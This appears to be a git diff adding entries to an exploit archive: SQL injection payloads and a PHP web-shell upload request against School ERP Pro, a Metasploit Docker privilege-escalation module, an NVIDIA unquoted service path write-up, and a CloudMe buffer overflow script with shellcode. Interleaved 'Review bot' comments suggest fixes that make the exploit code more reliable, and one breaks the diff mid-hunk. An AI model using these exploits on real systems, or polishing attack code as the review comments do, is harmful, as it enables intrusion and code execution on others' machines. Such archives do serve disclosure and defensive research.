diff --git a/exploits/windows/local/48387.txt b/exploits/macos/local/48387.txt similarity index 96% rename from exploits/windows/local/48387.txt rename to exploits/macos/local/48387.txt index 3db90cdc7..a41513a99 100644 --- a/exploits/windows/local/48387.txt +++ b/exploits/macos/local/48387.txt @@ -4,7 +4,7 @@ # Vendor Homepage: https://www.valvesoftware.com/en/ # Version: Source Engine, Tested on CS:GO BuildID: 4937372 TF2 BuildID: 4871679 Garry's Mod BuildID: 4803834 Half Life 2 BuildID: 4233302 # Tested on: MacOS 15.3 -# CVE : N/A +# CVE : CVE-2020-12242 import os, random, sys banner = """ diff --git a/exploits/php/webapps/48390.txt b/exploits/php/webapps/48390.txt new file mode 100644 index 000000000..90c220b18 --- /dev/null +++ b/exploits/php/webapps/48390.txt 
@@ -0,0 +1,44 @@ +# Exploit Title: School ERP Pro 1.0 - 'es_messagesid' SQL Injection +# Date: 2020-04-28 +# Author: Besim ALTINOK +# Vendor Homepage: http://arox.in +# Software Link: https://sourceforge.net/projects/school-erp-ultimate/ +# Version: latest version +# Tested on: Xampp +# Credit: İsmail BOZKURT + +SQL Injection Detail +-------------------------------- +*# Vulnerable parameter: es_messagesid* +*# Vulnerable code:* + +if($action=="fullmessage_sent"){ +$msg_qry ="SELECT * FROM es_messages WHERE +from_id=".$_SESSION['eschools']['user_id']." AND from_type='student' and +es_messagesid=".*$es_messagesid;* +$details_message=$db->getrow($msg_qry); +} +?> + +*Here is the SQLmap output:* +*----------------------------------------* + +GET parameter '*es_messagesid*' is vulnerable. +sqlmap identified the following injection point(s): +--- +Parameter: es_messagesid (GET) +Type: boolean-based blind +Title: OR boolean-based blind - WHERE or HAVING clause (NOT) +Payload: pid=27&action=fullmessage_sent&es_messagesid=17 OR NOT +6369=6369 + +Type: UNION query +Title: Generic UNION query (random number) - 12 columns +Payload: pid=27&action=fullmessage_sent&es_messagesid=17 UNION ALL +SELECT +6194,6194,6194,6194,6194,6194,CONCAT(0x7162626b71,0x664750636f625866666c63425571426c5277516c49506c696f6548764c5a617977414d4849575a67,0x71707a7671),6194,6194,6194,6194,6194-- +- +--- +[01:09:41] [INFO] testing MySQL +[01:09:42] [INFO] confirming MySQL +[01:09:44] [INFO] the back-end DBMS is MySQL \ No newline at end of file diff --git a/exploits/php/webapps/48392.txt b/exploits/php/webapps/48392.txt new file mode 100644 index 000000000..b6e2f697c --- /dev/null +++ b/exploits/php/webapps/48392.txt 
@@ -0,0 +1,103 @@ +# Exploit Title: School ERP Pro 1.0 - Remote Code Execution +# Date: 2020-04-28 +# Author: Besim ALTINOK +# Vendor Homepage: http://arox.in +# Software Link: https://sourceforge.net/projects/school-erp-ultimate/ +# Version: latest version +# Tested on: Xampp +# Credit: İsmail BOZKURT + +Description +------------------------------------------- +A student can send a message to the admin. Additionally, with this method, +the student can upload a PHP file to the system and run code in the system. + +------------------------------------ +*Vulnerable code - 1: (for student area) - sendmail.inc.php* +- Student user can send message to admin with the attachment +------------------------------------ +$image_file = basename($_FILES['newimage']['name'][$i]); +$ext=explode(".",$_FILES['newimage']['name'][$i]); +$str=date("mdY_hms"); +//$t=rand(1, 15); +$new_thumbname = "$ext[0]".$str.$t.".".$ext[1]; +$updir = "images/messagedoc/"; +$dest_path = $updir.$new_thumbname; +$up_images[$i] = $dest_path; +$srcfile = $_FILES['newimage']['tmp_name'][$i]; +@move_uploaded_file($srcfile, $dest_path); +$ins_arr_prod_images = array( +'`es_messagesid`' => $id, +'`message_doc`' => $new_thumbname +); +$idss=$db->insert("es_message_documents",$ins_arr_prod_images); + +--------------------------------------------------- +*PoC of the Remote Code Execution* +--------------------------------------------------- + +POST /erp/student_staff/index.php?pid=27&action=mailtoadmin HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 *************************** +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: +http://localhost/erp/student_staff/index.php?pid=27&action=mailtoadmin +Content-Type: multipart/form-data; +boundary=---------------------------2104557667975595321153031663 +Content-Length: 718 +DNT: 1 +Connection: close +Cookie: PHPSESSID=8a7cca1efcb3ff66502ed010172d497a; expandable=5c 
+Upgrade-Insecure-Requests: 1 + +-----------------------------2104557667975595321153031663 +Content-Disposition: form-data; name="subject" + +DEDED +-----------------------------2104557667975595321153031663 +Content-Disposition: form-data; name="message" + +

DEDED

+-----------------------------2104557667975595321153031663 +Content-Disposition: form-data; name="newimage[]"; filename="shell.php" +Content-Type: text/php + + + +-----------------------------2104557667975595321153031663 +Content-Disposition: form-data; name="filecount[]" + +1 +-----------------------------2104557667975595321153031663 +Content-Disposition: form-data; name="submit_staff" + +Send +-----------------------------2104557667975595321153031663-- + + +------------------------------------ +*Vulnerable code - 2: (for admin area) - pre-editstudent.inc.php* +- Admin user can update user profile photo +------------------------------------ +if (is_uploaded_file($_FILES['pre_image']['tmp_name'])) { +$ext = explode(".",$_FILES['pre_image']['name']); +$str = date("mdY_hms"); +$new_thumbname = "st_".$str."_".$ext[0].".".$ext[1]; +$updir = "images/student_photos/"; +$uppath = $updir.$new_thumbname; +move_uploaded_file($_FILES['pre_image']['tmp_name'],$uppath); +$file = $new_thumbname; + +------------------------------------ +Bypass Technique: +------------------------------------ + +$_FILES['pre_image']['name']; --- > shell.php.png +$ext = explode(".",$_FILES['pre_image']['name']); +--- +$new_thumbname = "st_".$str."_".$ext[0].".".$ext[1]; +$ext[0] --> shell +$ext[1] --> php +lastfilename --> st_date_shell.php \ No newline at end of file diff --git a/exploits/windows/local/48388.rb b/exploits/windows/local/48388.rb new file mode 100755 index 000000000..f63e3ffa5 --- /dev/null +++ b/exploits/windows/local/48388.rb 
@@ -0,0 +1,108 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ManualRanking + + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + include Post::Windows::Priv + include Post::Windows::Runas + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Docker-Credential-Wincred.exe Privilege Escalation', + 'Description' => %q{ + This exploit leverages a vulnerability in docker desktop + community editions prior to 2.1.0.1 where an attacker can write + a payload to a lower-privileged area to be executed + automatically by the docker user at login. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Morgan Roman', # discovery + 'bwatters-r7', # metasploit module + ], + 'Platform' => ['win'], + 'SessionTypes' => ['meterpreter'], + 'Targets' => [[ 'Automatic', {} ]], + 'DefaultTarget' => 0, + 'DefaultOptions' => { + 'WfsDelay' => 15 + }, + 'DisclosureDate' => '2019-07-05', + 'Notes' => + { + 'SideEffects' => [ ARTIFACTS_ON_DISK ] + }, + 'References' => [ + ['CVE', '2019-15752'], + ['URL', 'https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e'] + ] + ) + ) + register_options( + [OptString.new('PROGRAMDATA', [true, 'Path to docker version-bin.', '%PROGRAMDATA%'])] + ) + end + + def docker_version + output = cmd_exec('cmd.exe', '/c docker -v') + vprint_status(output) + version_string = output.match(/(\d+\.)(\d+\.)(\d)/)[0] + Gem::Version.new(version_string.split('.').map(&:to_i).join('.')) + end + + def check + if docker_version <= Gem::Version.new('18.09.0') + return CheckCode::Appears + end + + CheckCode::Safe + end + + def exploit + check_permissions! 
+ case get_uac_level + when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, + UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, + UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT + fail_with(Failure::NotVulnerable, + "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...") + when UAC_DEFAULT + print_good('UAC is set to Default') + print_good('BypassUAC can bypass this setting, continuing...') + when UAC_NO_PROMPT + print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead') + shell_execute_exe + return + end + + # make payload + docker_path = expand_path("#{datastore['PROGRAMDATA']}\\DockerDesktop\\version-bin") + fail_with(Failure::NotFound, 'Vulnerable Docker path is not on system') unless directory?(docker_path) + payload_name = 'docker-credential-wincred.exe' + payload_pathname = "#{docker_path}\\#{payload_name}" + vprint_status('Making Payload') + payload = generate_payload_exe + + # upload Payload + vprint_status("Uploading Payload to #{payload_pathname}") + write_file(payload_pathname, payload) + vprint_status('Payload Upload Complete') + print_status('Waiting for user to attempt to login') + end + + def check_permissions! + unless check == Exploit::CheckCode::Appears + fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') + end + fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system? + # Check if you are an admin + # is_in_admin_group can be nil, true, or false + end +end \ No newline at end of file diff --git a/exploits/windows/local/48391.txt b/exploits/windows/local/48391.txt new file mode 100644 index 000000000..851b86153 --- /dev/null +++ b/exploits/windows/local/48391.txt 
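Review bot: `docker_version` indexes the result of `output.match(/(\d+\.)(\d+\.)(\d)/)` without checking for nil, so when `docker -v` prints nothing parseable (binary not on PATH, or an error message) `check` raises NoMethodError instead of returning a CheckCode; returning nil from `docker_version` when there is no match (`m = output.match(...)` / `return nil unless m`) and having `check` answer `CheckCode::Unknown` for a nil version would keep the check clean. The final `(\d)` group also captures only one digit of the patch component, which would misparse a version such as 18.09.10 — `(\d+)`, as in the other two groups, avoids that. The description names Docker Desktop releases prior to 2.1.0.1 while `check` compares the `docker -v` output against 18.09.0; if that is the engine version bundled with the affected Desktop builds, a comment such as `# docker -v reports the bundled engine version; 18.09.0 is the last one shipped with an affected Desktop release -- confirm` would make the mapping explicit. The two trailing comments in `check_permissions!` describe an admin-group check that is not implemented and should be removed or turned into a TODO.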
@@ -0,0 +1,36 @@
+# Exploit Title: NVIDIA Update Service Daemon 1.0.21 - 'nvUpdatusService' Unquoted Service Path
+# Discovery by: Roberto Piña
+# Discovery Date: 2020-04-27
+# Vendor Homepage: https://www.nvidia.com/es-la/
+# Software Link : https://www.nvidia.com/es-la/
+# Tested Version: 1.0.21
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Pro x64 es
+
+# Step to discover Unquoted Service Path:
+
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "NVIDIA" | findstr /i /v """
+NVIDIA Update Service Daemon nvUpdatusService C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe Auto
+
+C:\>sc qc nvUpdatusService
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: nvUpdatusService
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START (DELAYED)
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Updatus\daemonu.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : NVIDIA Update Service Daemon
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: .\UpdatusUser
+
+C:\>
+
+#Exploit:
+# A successful attempt would require the local user to be able to insert their code in the system root path
+# undetected by the OS or other security applications where it could potentially be executed during
+# application startup or reboot. If successful, the local user's code would execute with the elevated
+# privileges of the application.
\ No newline at end of file
diff --git a/exploits/windows/remote/48389.py b/exploits/windows/remote/48389.py
new file mode 100755
index 000000000..bb9417d74
--- /dev/null
+++ b/exploits/windows/remote/48389.py
@@ -0,0 +1,48 @@ +# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC) +# Date: 2020-04-27 +# Exploit Author: Andy Bowden +# Vendor Homepage: https://www.cloudme.com/en +# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe +# Version: CloudMe 1.11.2 +# Tested on: Windows 10 x86 + +#Instructions: +# Start the CloudMe service and run the script. + +import socket + +target = "127.0.0.1" + +padding1 = b"\x90" * 1052 +EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET +NOPS = b"\x90" * 30 + +#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python +payload = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33" +payload += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc" +payload += b"\x89\xfe\x54\x82\x72\xff\xa4\xe3\xfb\x1a\x95\x23\x9f" +payload += b"\x6f\x85\x93\xeb\x22\x29\x5f\xb9\xd6\xba\x2d\x16\xd8" +payload += b"\x0b\x9b\x40\xd7\x8c\xb0\xb1\x76\x0e\xcb\xe5\x58\x2f" +payload += b"\x04\xf8\x99\x68\x79\xf1\xc8\x21\xf5\xa4\xfc\x46\x43" +payload += b"\x75\x76\x14\x45\xfd\x6b\xec\x64\x2c\x3a\x67\x3f\xee" +payload += b"\xbc\xa4\x4b\xa7\xa6\xa9\x76\x71\x5c\x19\x0c\x80\xb4" +payload += b"\x50\xed\x2f\xf9\x5d\x1c\x31\x3d\x59\xff\x44\x37\x9a" +payload += b"\x82\x5e\x8c\xe1\x58\xea\x17\x41\x2a\x4c\xfc\x70\xff" +payload += b"\x0b\x77\x7e\xb4\x58\xdf\x62\x4b\x8c\x6b\x9e\xc0\x33" +payload += b"\xbc\x17\x92\x17\x18\x7c\x40\x39\x39\xd8\x27\x46\x59" +payload += b"\x83\x98\xe2\x11\x29\xcc\x9e\x7b\x27\x13\x2c\x06\x05" +payload += b"\x13\x2e\x09\x39\x7c\x1f\x82\xd6\xfb\xa0\x41\x93\xf4" +payload += b"\xea\xc8\xb5\x9c\xb2\x98\x84\xc0\x44\x77\xca\xfc\xc6" +payload += b"\x72\xb2\xfa\xd7\xf6\xb7\x47\x50\xea\xc5\xd8\x35\x0c" +payload += b"\x7a\xd8\x1f\x6f\x1d\x4a\xc3\x5e\xb8\xea\x66\x9f" + +overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload)) + +buf = padding1 + EIP + NOPS + payload + overrun + +try: + s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((target,8888)) + s.send(buf) +except Exception as e: + 
print(sys.exc_value)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index cd1147589..92d972697 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11039,7 +11039,9 @@ id,file,description,date,author,type,platform,port
 48359,exploits/solaris/local/48359.c,"Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation",2020-04-21,"Marco Ivaldi",local,solaris,
 48364,exploits/windows/local/48364.py,"RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH)",2020-04-22,"Felipe Winsnes",local,windows,
 48378,exploits/windows/local/48378.txt,"Popcorn Time 6.2 - 'Update service' Unquoted Service Path",2020-04-24,"Uriel Yochpaz",local,windows,
-48387,exploits/windows/local/48387.txt,"Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution",2020-04-27,0xEmma,local,windows,
+48387,exploits/macos/local/48387.txt,"Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution",2020-04-27,0xEmma,local,macos,
+48388,exploits/windows/local/48388.rb,"Docker-Credential-Wincred.exe - Privilege Escalation (Metasploit)",2020-04-28,Metasploit,local,windows,
+48391,exploits/windows/local/48391.txt,"NVIDIA Update Service Daemon 1.0.21 - 'nvUpdatusService' Unquoted Service Path",2020-04-28,"Roberto Piña",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
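Review bot: The `except Exception as e:` handler at the end of the hunk calls `print(sys.exc_value)`, but `sys` is never imported and `sys.exc_value` does not exist in Python 3, so any connection failure surfaces as a NameError that hides the real error; the handler already binds the exception, so the body should be `print(e)`. The socket created in the `try` block is also never closed, and `with socket.create_connection((target, 8888)) as s:` would scope its lifetime while leaving the subsequent `s.send(buf)` unchanged. The `except` line itself sits on the previous source line; the point applies to the `print(...)` call that follows it.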
@@ -18113,6 +18115,7 @@ id,file,description,date,author,type,platform,port
 48343,exploits/linux/remote/48343.rb,"Nexus Repository Manager - Java EL Injection RCE (Metasploit)",2020-04-17,Metasploit,remote,linux,
 48353,exploits/linux/remote/48353.rb,"Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)",2020-04-20,Metasploit,remote,linux,
 48363,exploits/windows/remote/48363.py,"Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption",2020-04-21,hyp3rlinx,remote,windows,
+48389,exploits/windows/remote/48389.py,"CloudMe 1.11.2 - Buffer Overflow (PoC)",2020-04-28,"Andy Bowden",remote,windows,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -42622,3 +42625,5 @@ id,file,description,date,author,type,platform,port
 48384,exploits/hardware/webapps/48384.txt,"Netis E1+ V1.2.32533 - Unauthenticated WiFi Password Leak",2020-04-27,Besim,webapps,hardware,
 48385,exploits/php/webapps/48385.txt,"Online Course Registration 2.0 - Authentication Bypass",2020-04-27,"Daniel Monzón",webapps,php,
 48386,exploits/php/webapps/48386.txt,"Maian Support Helpdesk 4.3 - Cross-Site Request Forgery (Add Admin)",2020-04-27,Besim,webapps,php,
+48390,exploits/php/webapps/48390.txt,"School ERP Pro 1.0 - 'es_messagesid' SQL Injection",2020-04-28,Besim,webapps,php,
+48392,exploits/php/webapps/48392.txt,"School ERP Pro 1.0 - Remote Code Execution",2020-04-28,Besim,webapps,php,